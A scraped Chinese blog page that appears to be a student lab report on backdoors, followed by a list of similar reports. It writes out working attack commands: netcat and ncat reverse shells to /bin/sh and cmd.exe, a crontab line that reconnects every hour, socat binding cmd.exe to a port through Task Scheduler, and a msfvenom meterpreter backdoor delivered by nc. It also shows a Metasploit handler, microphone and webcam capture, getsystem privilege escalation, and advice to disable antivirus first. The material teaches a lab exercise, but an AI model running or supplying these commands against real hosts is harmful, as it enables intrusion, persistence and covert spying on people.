2. 程式人生 > >20155216 Exp2 後門原理與實踐

20155216 Exp2 後門原理與實踐

阿新 發佈:2018-03-27
hand 地址 同時 bin log code 文字 其他 進行

後門原理與實踐

常用後門工具

NC 或 netcat

netcat是一個底層工具,進行基本的TCP UDP數據收發。常被與其他工具結合使用,起到後門的作用。

Linux: 一般自帶netcat,"man netcat" 或"man nc"可查看其使用說明。

技術分享圖片

Win獲得Linux Shell

1、windows 打開監聽

先解壓ncat.rar,使用Dos命令行,進入ncat文件夾運行可執行文件ncat.exe。使用 ncat.exe -l -p 5216 使5216端口處於監聽狀態。

2、Linux反彈連接win

使用ipconfig查詢主機IP地址。

技術分享圖片

使用 nc 192.168.1.104 5216 -e /bin/sh

3、windows下獲得一個linux shell

可運行任何指令,如ls:

技術分享圖片

Linux獲得Win Shell

1、Linux運行監聽指令

Linux下輸入命令 nc -l -p 5216

2、.Windows反彈連接Linux

使用 ifconfig 查看Linux的IP地址。

技術分享圖片

使用Dos命令行輸入 ncat.exe -e cmd.192.168.253.128 5216

3.Linux下看到Windows的命令提示

技術分享圖片

Netcat擴展知識

nc傳輸數據

1、Windows下監聽5216端口: ncat.exe -l -p 5216

2、Kali下連接到Windows的5216端口: nc -l -p 5216

3、建立之後進行文字傳輸

windows再啟動一個Dos界面,輸入 ncat.exe -l 5216

技術分享圖片

Kali再起另一終端,輸入 nc 192.168.1.104 5216

技術分享圖片

之後進行文本傳輸。

使用netcat獲取主機操作Shell

1、先在Windows系統下,監聽5216端口。

2、用crontab -e指令編輯一條定時任務,選擇編輯器時選擇3 basic vim編輯器。

3、在最後一行添加 45 * * * * /bin/netcat 192.168.1.104 5216 -e /bin/sh

即在每個小時的第45分鐘反向連接Windows主機的5216端口。

技術分享圖片

在第45分鐘,連接成功。

技術分享圖片

使用socat獲取主機操作Shell

1、在Windows系統下,打開控制面板下搜索任務計劃開始創建任務,填寫任務名稱後,新建一個觸發器

技術分享圖片

2、在操作->程序或腳本中選擇socat.exe文件的路徑,在添加參數一欄填寫 tcp-listen:5216 exec:cmd.exe,pty,stderr ,這個命令的作用是把cmd.exe綁定到端口5216,同時把cmd.exe的stderr重定向到stdout上:

技術分享圖片

3、創建完成之後運行。

技術分享圖片

此時彈出一個命令端:

技術分享圖片

4、此時,在Kali環境下輸入指令socat - tcp:192.168.1.104:5216,這裏的第一個參數-代表標準的輸入輸出,使第二個流連接到Windows主機的5216端口,此時可以發現已經成功獲得了一個cmd shell:

技術分享圖片

使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

1、輸入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.15.132 LPORT=4312 -f exe > 20154312_backdoor.exe 生成後門程序。

技術分享圖片

2、通過nc指令將生成的後門程序傳送到Windows主機上

kali端使用命令: nc 192.168.1.104 5216 < 20155216_backdoor.exe 傳送程序。

windows端使用命令: ncat.exe -l 5216 > 20155216_backdoor.exe 接受程序。

ps:如果無法使用命令進行傳送,也可手動將後門程序拷貝至windows;傳輸後門程序之前,先將主機的防護軟件關閉。

3、在Kali上使用 msfconsole 指令進入msf控制臺,輸入命令 use exploit/multi/handler 使用監聽模塊,使用命令 set payload windows/meterpreter/reverse_tcp 設置payload,設置反彈回連的IP和端口:

技術分享圖片

4、設置完成後,執行監聽:

技術分享圖片

5、打開Windows上的後門程序:

使用MSF meterpreter生成獲取目標主機音頻、攝像頭等內容,並嘗試提權

可使用record_mic指令截獲一段音頻

也可嘗試使用webcam_snap指令可以使用攝像頭進行拍照

技術分享圖片

技術分享圖片

先使用getuid指令查看當前用戶,並使用getsystem指令進行提權

技術分享圖片

可能是因為windows8.1的環境問題,無法進行提權。

20155216 Exp2 後門原理與實踐

相關推薦

20155216 Exp2 後門原理實踐

hand 地址 同時 bin log code 文字 其他 進行 後門原理與實踐 常用後門工具 NC 或 netcat netcat是一個底層工具,進行基本的TCP UDP數據收發。常被與其他工具結合使用,起到後門的作用。 Linux: 一般自帶netcat,"man ne

Exp2 後門原理實踐(未完待續)

bin image alt job 模塊 加強 ont .sh 問題 Exp2 後門原理與實踐 實驗環境 攻擊機 kali 4.14(64位) (IP: 10.0.2.6/24) 靶機 ubuntu 16.04(32位) (IP: 10.0.2.4/24) windo

網絡對抗技術 2017-2018-2 20152515 Exp2 後門原理實踐

技術分享 cnblogs 利用 mage 可選 任務計劃 攝像頭 寫入 提權 1.實驗內容 (1)使用netcat獲取主機操作Shell,cron啟動 (0.5分) (2)使用socat獲取主機操作Shell, 任務計劃啟動 (0.5分) (3)使用MSF meterp

20155227《網絡對抗》Exp2 後門原理實踐

web img 準備 etc ons 並運行 reverse 體會 定時 20155227《網絡對抗》Exp2 後門原理與實踐 基礎問題回答 (1)例舉你能想到的一個後門進入到你系統中的可能方式? 在非官方網站下載軟件時,後門很可能被捆綁在軟件中。 攻擊者利用欺騙的手段,

20154324 劉康權 《網絡對抗》Exp2 後門原理實踐

nsh png netcat nta vim編輯 時間 clas 自己的 rontab 一、實踐目標與內容 1.學習內容 使用nc實現win,mac,Linux間的後門連接 meterpreter的應用 MSF POST 模塊的應用 2.學習目標 學習建立一個後門連接

Exp2 後門原理實踐 20154301仉鑫燁

編輯 lock 命令 兩臺 鎖定 com windows 程序 獲取 20154301《網絡對抗》Exp2 後門原理與實踐 20154301仉鑫燁 一、實驗內容 常用後門工具實踐: Windows獲得Linux Shell: 在Windows下,先使用ipconf

20155312 張競予 Exp2 後門原理實踐

gets std pty ever 哪些 分享圖片 程序 啟動過程 學會 Exp2 後門原理與實踐 目錄 基礎問題回答 (1)例舉你能想到的一個後門進入到你系統中的可能方式? (2)例舉你知道的後門如何啟動起來(win及linux)的方式? (3)Meterprete

Exp2 後門原理實踐

linux title 本機 學習目標 ont 網段 OS net channel 一、實踐目標與內容 1.學習內容 使用nc實現win,mac,Linux間的後門連接 meterpreter的應用 MSF POST 模塊的應用 2.學習目標 學習建

20155209 林虹宇Exp2 後門原理實踐

拍照 端口 一個 err 當前 list gets 沒有 com Exp2 後門原理與實踐 實驗內容 一、使用netcat獲取主機操作Shell,cron啟動 使用netcat獲取主機操作Shell Win獲得Linux Shell 查看win的ip地址 windo

20155334 曹翔 Exp2 後門原理實踐

bubuko 直接 net 重定向 system 技術 image AR ali 20155334 曹翔 Exp2 後門原理與實踐 不多廢話直接上實驗過程,本實驗的所有端口都是5334。 一、實驗過程 查詢主機Windows和虛擬機kali的ip地址: Windows

2018-2019-2 網絡對抗技術 20165230 Exp2 後門原理實踐

ping 反向連接 後門 操作 netcat 方式 拍照 art 基本 目錄 1.實驗內容 2.基礎問題回答 3.常用後門工具實踐 3.1netcat 3.

Exp2 後門原理實踐 ——20164316張子遙

操作系統 linux定時任務 con 管理員 遠程控制 clear 最後一行 任務管理器 地址 一、實踐基本內容 1.實踐目標 (1)使用netcat獲取主機操作Shell,cron啟動 (2)使用socat獲取主機操作Shell, 任務計劃啟動 (3)使用MS

2018-2019-2 網絡對抗技術 20165231 Exp2 後門原理實踐

class 一個 打開 功能 目標 rontab head 定時任務 con 實驗內容 1.使用netcat獲取主機操作Shell,cron啟動 2.使用socat獲取主機操作Shell, 任務計劃啟動 3.使用MSF meterpreter(或其他軟件)生成可執

20165306 Exp2 後門原理實踐

技術分享 out web hot erp 流程 常用 開始 cron 20165306 Exp2 後門原理與實踐 實驗內容 (1)使用netcat獲取主機操作Shell,cron啟動 (2)使用socat獲取主機操作Shell, 任務計劃啟動 (3)使用MSF meterp

20165229 NetSec Exp2後門原理實踐

其他 準備 tun sfc ip地址 開機 消息 cor mach 20165229 NetSec Exp2後門原理與實踐 一、基礎問題 例舉你能想到的一個後門進入到你系統中的可能方式? 打開一個掛碼網頁,會自動下載安裝並執行木馬程序,在系統中留下後門。 將不明來源

Exp2後門原理實踐 20164312馬孝濤

有一個 方式 提權 3.2 控制 傳輸 監聽 web show 實驗內容 使用netcat獲取主機操作Shell,cron啟動 (0.5分) 使用socat獲取主機操作Shell, 任務計劃啟動 (0.5分) 使用MSF meterpreter

2018-2019-2 20165331《網絡對抗技術》Exp2 後門原理實踐

ima 例如 pty 並運行 art 就是 輸入 options lin 2018-2019-2 20165331《網絡對抗技術》Exp2 後門原理與實踐 實驗收獲與感想 通過本次實驗,我對後門的生成及工作原理有了更深的理解,也學會了怎樣用後門攻擊同一網段下的不同主機。但是

網路對抗技術Exp2-後門原理實踐

**後門概念** 後門就是不經過正常認證流程而訪問系統的通道。 哪裡有後門呢? 編譯器留後門 作業系統留後門 最常見的當然還是應用程式中留後門 還有就是潛伏於作業系統中或偽裝為特定應用的專用後門程式。 -- 下面是近些年的一些例子: 編譯器:蘋果Xcode後門事件。蘋果Xcode後門事件中招的APP包

20154307 《網絡對抗技術》實驗二 後門原理實踐

文件的 img 選擇 msfvenom 任務計劃 err clas 關閉 ali 20154307 《網絡對抗技術》實驗二 後門原理與實踐 一、基礎問題回答 (1)例舉你能想到的一個後門進入到你系統中的可能方式? 答:下載盜版軟件或者盜版電影的時候。 (2)例舉你知道的後門

2017-2018-2 20155231《網絡對抗技術》實驗二:後門原理實踐

虛擬機ip src oca ali 執行 -m 定時 port art 2017-2018-2 20155231《網絡對抗技術》實驗二:後門原理與實踐 常用後門工具 一、Windows獲得Linux的Shell 在本機cmd中使用ipconfig獲得windows的IP地址